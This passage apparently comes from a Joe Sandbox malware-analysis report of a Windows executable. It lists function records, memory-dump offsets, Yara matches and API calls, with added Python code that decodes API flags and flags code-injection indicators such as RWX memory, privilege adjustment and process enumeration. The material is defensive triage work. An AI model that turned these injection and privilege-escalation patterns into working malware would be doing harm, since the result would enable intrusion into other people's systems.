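             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
TOKEN_ACCESS = {0x08: "TOKEN_QUERY", 0x20: "TOKEN_ADJUST_PRIVILEGES"}
FMT_FLAGS = {0x200: "FORMAT_MESSAGE_IGNORE_INSERTS", 0x1000: "FORMAT_MESSAGE_FROM_SYSTEM"}
TH32_FLAGS = {0x2: "TH32CS_SNAPPROCESS"}
SC_MANAGER_ALL_ACCESS = 0xF003F

# (0-based argument index, flag table) per API.
DECODERS = {
    "VirtualAlloc": [(2, MEM_FLAGS), (3, PAGE_PROT)],
    "VirtualProtect": [(2, PAGE_PROT)],
    "OpenProcessToken": [(1, TOKEN_ACCESS)],
    "FormatMessageW": [(0, FMT_FLAGS)],
    "CreateToolhelp32Snapshot": [(0, TH32_FLAGS)],
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    decoded: dict = field(default_factory=dict)   # arg index -> "FLAG|FLAG"
    findings: list = field(default_factory=list)  # triage notes for this call


def _int(arg):
    """Hex argument -> int; '?' (unresolved by the sandbox) or a name -> None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_flags(value, table):
    """Expand a bitmask into names from `table`; unknown leftover bits stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def triage(call):
    """Attach findings for the call patterns worth a second look in this report."""
    if call.api in ("VirtualAlloc", "VirtualProtect"):
        prot = call.decoded.get(3 if call.api == "VirtualAlloc" else 2, "")
        if "PAGE_EXECUTE_READWRITE" in prot:
            call.findings.append("RWX memory requested: typical of in-memory unpacking or code injection")
    elif call.api == "OpenProcessToken" and "TOKEN_ADJUST_PRIVILEGES" in call.decoded.get(1, ""):
        call.findings.append("token opened for privilege adjustment")
    elif call.api == "LookupPrivilegeValueW" and len(call.args) > 1:
        call.findings.append(f"privilege requested: {call.args[1]}")
    elif call.api == "OpenSCManagerW" and len(call.args) > 2 and _int(call.args[2]) == SC_MANAGER_ALL_ACCESS:
        call.findings.append("SC_MANAGER_ALL_ACCESS: can create or modify services")
    elif call.api == "CreateToolhelp32Snapshot" and "TH32CS_SNAPPROCESS" in call.decoded.get(0, ""):
        call.findings.append("process list enumeration")


def parse_line(line):
    """Parse one report line into an ApiCall with decoded flags, or None if it does not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")]
    call = ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))
    for idx, table in DECODERS.get(call.api, []):
        if idx < len(args) and _int(args[idx]) is not None:
            call.decoded[idx] = decode_flags(_int(args[idx]), table)
    triage(call)
    return call


def triage_report(lines):
    """Return [(ref address as 8-digit hex, finding), ...] over all parsable lines."""
    calls = [c for c in map(parse_line, lines) if c is not None]
    return [(f"{c.ref:08X}", f) for c in calls for f in c.findings]


if __name__ == "__main__":
    for call in filter(None, map(parse_line, SAMPLE_LINES)):
        print(f"{call.ref:08X} {call.api}: {call.decoded} {call.findings}")
```

                                    Run against the sample lines, the decoder reads the VirtualAlloc at 0040EC7E as MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE and flags it, while the VirtualAlloc at 005F0111 (PAGE_READWRITE) is not flagged on its own; in that second function the executable protection is applied later by VirtualProtect, whose arguments the report does not resolve, so the decoder leaves the "?" placeholders untouched rather than guessing. FormatMessageW's 00001200 decodes to FORMAT_MESSAGE_FROM_SYSTEM|FORMAT_MESSAGE_IGNORE_INSERTS, which together with the "WARNING: %s failed with error %d (%s)" string marks that function as an ordinary error-reporting helper rather than something to chase.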
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *'$lmu/$lmu/
                                    • API String ID: 0-636906075
                                    • Opcode ID: 9225c70673361e4e4156f0746dad4bc534e091efd2a74c1fef8709565fb512f5
                                    • Instruction ID: 736527d0488f6f1c7e8dcc17fe454a9d0596978e8c93251d9c5221ff88c726d9
                                    • Opcode Fuzzy Hash: 9225c70673361e4e4156f0746dad4bc534e091efd2a74c1fef8709565fb512f5
                                    • Instruction Fuzzy Hash: 8C022270AC43018BC66CEA78D88956F76D39BC4748F64882EF582C73D1EE24CD668797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *'$lmu/$lmu/
                                    • API String ID: 0-636906075
                                    • Opcode ID: b7524a3de83cd4a76f4d447deb268b03eed86ef20e49021a3d0791e93a30b770
                                    • Instruction ID: bfc592a59e1dac49656133326e38a73f7955ef2d5ca8e75a8a8e25ffb51373d0
                                    • Opcode Fuzzy Hash: b7524a3de83cd4a76f4d447deb268b03eed86ef20e49021a3d0791e93a30b770
                                    • Instruction Fuzzy Hash: 2502F635A0830E87DA24AA68888913E7ED17BD4750F744D2AF796CB351EE3CCD4587A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: DR$Ou$fX
                                    • API String ID: 0-261343277
                                    • Opcode ID: 9a4cfae2509eada84d4514ed3e752f1f713b4941d1beb8100a69beae9a0044a5
                                    • Instruction ID: 540b9bb482925fb2ddd9e8f9f14f804f07e76b9febed83197d8c3a6d9f544a46
                                    • Opcode Fuzzy Hash: 9a4cfae2509eada84d4514ed3e752f1f713b4941d1beb8100a69beae9a0044a5
                                    • Instruction Fuzzy Hash: AC81A0716087058FD728DF68998563ABAE4BBC4714F00092EF285D7394E7B8D909CB56
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: DR$Ou$m
                                    • API String ID: 0-902897619
                                    • Opcode ID: b62bf488743f1a2059ce3998f655a55e53d780affa885b97e3efcba5522db659
                                    • Instruction ID: a52b96af204781e47819a47b9c72ca1cd059e3f14f13794958ca04305cdfbe69
                                    • Opcode Fuzzy Hash: b62bf488743f1a2059ce3998f655a55e53d780affa885b97e3efcba5522db659
                                    • Instruction Fuzzy Hash: 0861AF71A087068BD718EF68C849A3EBBE5BBD0714F04491DF6D5D7294D7B8C909CB82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #CH.$#CH.$\au
                                    • API String ID: 0-122621526
                                    • Opcode ID: 82e2cfa5556967d161bd3d2bcdb052a574f9c125b0815518756db8578ac95d5e
                                    • Instruction ID: 6eac3d1373298bed3042ed380473540bf717abe695c5f5eba4b693c7a7d5a2c0
                                    • Opcode Fuzzy Hash: 82e2cfa5556967d161bd3d2bcdb052a574f9c125b0815518756db8578ac95d5e
                                    • Instruction Fuzzy Hash: C241E270B802009FDB6CDBA89C81B7F729BAB94710F54492EB585DB3C5DEA5DD018352
                                    APIs
                                      • Part of subcall function 00410250: __wcstoi64.LIBCMT ref: 00410246
                                    • LdrFindResource_U.NTDLL(00400000,?,00000000), ref: 0040E988
                                    • LdrAccessResource.NTDLL(00400000,?,?,?), ref: 0040E9A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: AccessFindResourceResource___wcstoi64
                                    • String ID:
                                    • API String ID: 2704380589-0
                                    • Opcode ID: d30840d2d2ead43e04db132799bc46682c7cb9d7c0ce2fb371b64fffc8a1bc2b
                                    • Instruction ID: 9141d4ce81294af721937c9894f8c7d92bdb9d8b2fa3c749db9c995ded6ab3af
                                    • Opcode Fuzzy Hash: d30840d2d2ead43e04db132799bc46682c7cb9d7c0ce2fb371b64fffc8a1bc2b
                                    • Instruction Fuzzy Hash: E511F8B5618301AFC304DF15D851BABBBE4BBC8744F408D2EF48997251D778E9488B96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: j>$_I
                                    • API String ID: 0-1249037685
                                    • Opcode ID: 984e086376af8a6a208711bc64dd2d58036b1380d25653babe967f55a3ac1166
                                    • Instruction ID: ae283642ad28cf50a73b261e51888c240b41a4820707e652249cb0ae396d4041
                                    • Opcode Fuzzy Hash: 984e086376af8a6a208711bc64dd2d58036b1380d25653babe967f55a3ac1166
                                    • Instruction Fuzzy Hash: 79A19C71A483028BD75CDF68D94552BB6E6BBC4744F004A2DF5869B390E770EE09CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: j>$_I
                                    • API String ID: 0-1249037685
                                    • Opcode ID: 29f85d3dca72841e53796d257874640ed7d86128da8aafbf7407b600ee0fd507
                                    • Instruction ID: 853e7df9c4b0a6f7bfa213099c5972a9325ea15a5a17aeb8fc519338bb15832a
                                    • Opcode Fuzzy Hash: 29f85d3dca72841e53796d257874640ed7d86128da8aafbf7407b600ee0fd507
                                    • Instruction Fuzzy Hash: 36A1D571A087068FC758DF68D54962E7BE5BBC4300F00492DF686AB2A4E778DD09CB92
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00013DEE), ref: 00413E35
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 235ea5c9bef6c299f322fcec842cddea2a7dec40c526a528a8edc706dd861580
                                    • Instruction ID: 123ae4dee83c8ecde87b64a495cd6158ef4cf236bc87e197f895214c45768a6d
                                    • Opcode Fuzzy Hash: 235ea5c9bef6c299f322fcec842cddea2a7dec40c526a528a8edc706dd861580
                                    • Instruction Fuzzy Hash: 8C9002B43521005647002B726C295C52D905A4C623B9144B1E409C5054DA554688951E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Z#
                                    • API String ID: 0-2750076499
                                    • Opcode ID: cedde206f0f59ecf413341c8fb1e5ddeafa856b9eff8ac45936b31663709639c
                                    • Instruction ID: 199c82f012c1b3d585506ab725660c616c4e9c7d21aa09f8ca91788eae1b9eca
                                    • Opcode Fuzzy Hash: cedde206f0f59ecf413341c8fb1e5ddeafa856b9eff8ac45936b31663709639c
                                    • Instruction Fuzzy Hash: A44187B16483019FC348EF68D84506BB7E6FFD5714F408D2DE49A8B3A0D7B899058F82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Z#
                                    • API String ID: 0-2750076499
                                    • Opcode ID: 48aefe013c6b0e285082495dbe214cf7901ff6248647a73da0f804c683cf7bf0
                                    • Instruction ID: a4ef1b2fefedf2e0686fb2c55d4bd8005fd8afe73a7f8fd4a288738e3efc94df
                                    • Opcode Fuzzy Hash: 48aefe013c6b0e285082495dbe214cf7901ff6248647a73da0f804c683cf7bf0
                                    • Instruction Fuzzy Hash: 20418D71A087059FD308EF64C94502EB7E1BFD5714F408C2DE5D987264D7B89916CF42
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: G
                                    • API String ID: 0-2152773504
                                    • Opcode ID: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction ID: aa7a5b408a14f24676e19c11f71732be0c5034c98a190a30652478e543f48e21
                                    • Opcode Fuzzy Hash: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction Fuzzy Hash: B341F1B19093968BD314DF18E18946BB7F5FB80B15F004D5EF4A09A291E3B4DA4CCBA3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: G
                                    • API String ID: 0-2152773504
                                    • Opcode ID: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction ID: f473f3570c16826d77451b9ecdcd101c455dd3b49d251d2e4a5980bdc96622b6
                                    • Opcode Fuzzy Hash: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction Fuzzy Hash: BB41E2B150939A8BD314DF14E18846BBBE0FB80715F404E5EF5A19B251E3B8DA5CCBA3
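The per-function records in this listing share one fixed layout, and reading them side by side shows something the individual entries do not: the function carrying the string "G" has the same Opcode ID in the dump at 005F0000 (based on PE: false, Yara match) and in the dump at 00600000 (based on PE: true, Yara match), which is consistent with code that was written into memory at run time rather than mapped from the file on disk. The following Python is an added example and is not part of the Joe Sandbox report or its tooling. It parses records in the layout visible on this page from a constructed sample (three records copied, abridged, from the listing above), collects the APIs each function calls, and reports Opcode IDs that recur at more than one dump offset as well as dump regions that are Yara-matched but not PE-backed. The layout it assumes is only what appears on this page; nothing about Joe Sandbox's own export formats is assumed.

```python
"""Parse Joe Sandbox per-function records and flag code that recurs across dumps."""
import re
from dataclasses import dataclass, field

SOURCE_RE = re.compile(
    r"Source File: (\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
SUBCALL_RE = re.compile(r"^Part of subcall function [0-9A-Fa-f]+: ")
API_RE = re.compile(r"^([A-Za-z0-9_]+)\.([A-Za-z0-9_]+)")  # Name.MODULE(...)
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Constructed sample: three records abridged from the report listing above (the
# LdrFindResource_U function in the on-disk image at 00400000, and the "G"
# function that appears in both the 00600000 and 005F0000 dumps).
SAMPLE = """
APIs
  • Part of subcall function 00410250: __wcstoi64.LIBCMT ref: 00410246
• LdrFindResource_U.NTDLL(00400000,?,00000000), ref: 0040E988
• LdrAccessResource.NTDLL(00400000,?,?,?), ref: 0040E9A6
Memory Dump Source
• Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AccessFindResourceResource___wcstoi64
• String ID:
• Opcode ID: d30840d2d2ead43e04db132799bc46682c7cb9d7c0ce2fb371b64fffc8a1bc2b
• Instruction ID: 9141d4ce81294af721937c9894f8c7d92bdb9d8b2fa3c749db9c995ded6ab3af
• Instruction Fuzzy Hash: E511F8B5618301AFC304DF15D851BABBBE4BBC8744F408D2EF48997251D778E9488B96
Strings
Memory Dump Source
• Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
Yara matches
Similarity
• String ID: G
• Opcode ID: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
• Instruction ID: aa7a5b408a14f24676e19c11f71732be0c5034c98a190a30652478e543f48e21
• Instruction Fuzzy Hash: B341F1B19093968BD314DF18E18946BB7F5FB80B15F004D5EF4A09A291E3B4DA4CCBA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
Yara matches
Similarity
• String ID: G
• Opcode ID: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
• Instruction ID: f473f3570c16826d77451b9ecdcd101c455dd3b49d251d2e4a5980bdc96622b6
• Instruction Fuzzy Hash: BB41E2B150939A8BD314DF14E18846BBBE0FB80715F404E5EF5A19B251E3B8DA5CCBA3
"""


@dataclass
class FunctionRecord:
    source_file: str = ""
    offset: str = ""
    based_on_pe: bool = False
    yara_match: bool = False
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    opcode_id: str = ""
    instruction_id: str = ""


def parse_records(text: str) -> list:
    """Split the flat listing into records; each ends at its Instruction Fuzzy Hash line."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:               # section header, decides how bullets are read
            section = line
            continue
        if line == "Yara matches":        # only present when a rule hit this dump
            cur.yara_match = True
            continue
        body = line.lstrip("• ").strip()
        m = SOURCE_RE.search(body)
        if m:
            cur.source_file, cur.offset = m.group(1), m.group(2)
            cur.based_on_pe = m.group(3) == "true"
        elif body.startswith("Opcode ID:"):
            cur.opcode_id = body.split(":", 1)[1].strip()
        elif body.startswith("Instruction ID:"):
            cur.instruction_id = body.split(":", 1)[1].strip()
        elif body.startswith("Instruction Fuzzy Hash:"):   # last field of a record
            records.append(cur)
            cur, section = FunctionRecord(), None
        elif section == "APIs":           # "Name.MODULE(args), ref: addr", maybe a subcall
            am = API_RE.match(SUBCALL_RE.sub("", body))
            if am:
                cur.apis.append(am.group(1))
        elif section == "Strings":        # "literal, xrefs: addr[, addr]"
            cur.strings.append(body.split(", xrefs:", 1)[0])
    return records


def shared_opcodes(records) -> dict:
    """Opcode IDs seen at more than one dump offset, mapped to the set of offsets."""
    seen = {}
    for r in records:
        if r.opcode_id:
            seen.setdefault(r.opcode_id, set()).add(r.offset)
    return {k: v for k, v in seen.items() if len(v) > 1}


def payload_offsets(records) -> set:
    """Offsets of dumps that matched Yara but are not backed by the PE on disk."""
    return {r.offset for r in records if r.yara_match and not r.based_on_pe}
```

Running `shared_opcodes(parse_records(SAMPLE))` on the sample returns the single Opcode ID 5eefff… mapped to the offsets 005F0000 and 00600000, and `payload_offsets` returns only 005F0000. Pasting the full function listing from a report into `SAMPLE` in place of the abridged records gives the same grouping across every function, which is a quick way to see which dump region holds the injected code and which functions of the on-disk stub (here the LdrFindResource_U/LdrAccessResource caller) are worth opening first.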
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
                                    • Instruction ID: fba1ddaebf6ba0661dd4ef5a84b6cd5216cd9576a71e7ab75de673a33984f360
                                    • Opcode Fuzzy Hash: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
                                    • Instruction Fuzzy Hash: F5F120B4A01209EFDB04DF94C994BAEBBB1FF48304F248558EA06A7386D775EE41DB50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                    • Instruction ID: 050fbb030783bbccb0c69090dab3363382d2d3d2bf9eeff31fd1a260ac936f65
                                    • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                    • Instruction Fuzzy Hash: A231D53660434A8FCB10DF18C480936BBE4FF88314F49196DEA9587353D338F9068B91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction Fuzzy Hash:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction Fuzzy Hash:
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004109B8), ref: 00413A7F
                                    • __mtterm.LIBCMT ref: 00413A8B
                                      • Part of subcall function 004137C4: DecodePointer.KERNEL32(00000006,00413BED,?,004109B8), ref: 004137D5
                                      • Part of subcall function 004137C4: TlsFree.KERNEL32(00000004,00413BED,?,004109B8), ref: 004137EF
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000000,00000000,77385810,?,00413BED,?,004109B8), ref: 00414742
                                      • Part of subcall function 004137C4: _free.LIBCMT ref: 00414745
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000004,77385810,?,00413BED,?,004109B8), ref: 0041476C
                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00413AA1
                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00413AAE
                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00413ABB
                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00413AC8
                                    • TlsAlloc.KERNEL32(?,004109B8), ref: 00413B18
                                    • TlsSetValue.KERNEL32(00000000,?,004109B8), ref: 00413B33
                                    • __init_pointers.LIBCMT ref: 00413B3D
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B4E
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B5B
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B68
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B75
                                    • DecodePointer.KERNEL32(00413948,?,004109B8), ref: 00413B96
                                    • __calloc_crt.LIBCMT ref: 00413BAB
                                    • DecodePointer.KERNEL32(00000000,?,004109B8), ref: 00413BC5
                                    • GetCurrentThreadId.KERNEL32 ref: 00413BD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                    • API String ID: 3698121176-3819984048
                                    • Opcode ID: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction ID: b88612f9e2fa8c258af8cfdc3785799afccaa31c7b0e2b814971bbd95b978274
                                    • Opcode Fuzzy Hash: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction Fuzzy Hash: 9E31B370904215ABD710AFB9FD096E63FF0AB48765710843BE815D32B1E7799986CF8C
                                    APIs
                                    • PostQuitMessage.USER32(00000000), ref: 0040F8A1
                                    • ShowWindow.USER32(00000000,00000001), ref: 0040F8BA
                                    • SendMessageW.USER32(00000000,0000100C,000000FF,00000002), ref: 0040F901
                                    • wsprintfW.USER32 ref: 0040F92B
                                    • MessageBoxW.USER32(00000000,System process can't been terminated!,Windows Notification,00000000), ref: 0040F956
                                    • SendMessageW.USER32(00000000,0000100C,00000000,00000002), ref: 0040F96B
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040FA5F
                                    Strings
                                    • View All Processes, xrefs: 0040F991
                                    • View My Processes, xrefs: 0040F9AC
                                    • iPos=%d, xrefs: 0040F925
                                    • The application name can't be found. Please make sure whether the name is right!, xrefs: 0040F9F9
                                    • System process can't been terminated!, xrefs: 0040F950
                                    • Windows Notification, xrefs: 0040F94B, 0040F9F4
                                    Memory Dump Source
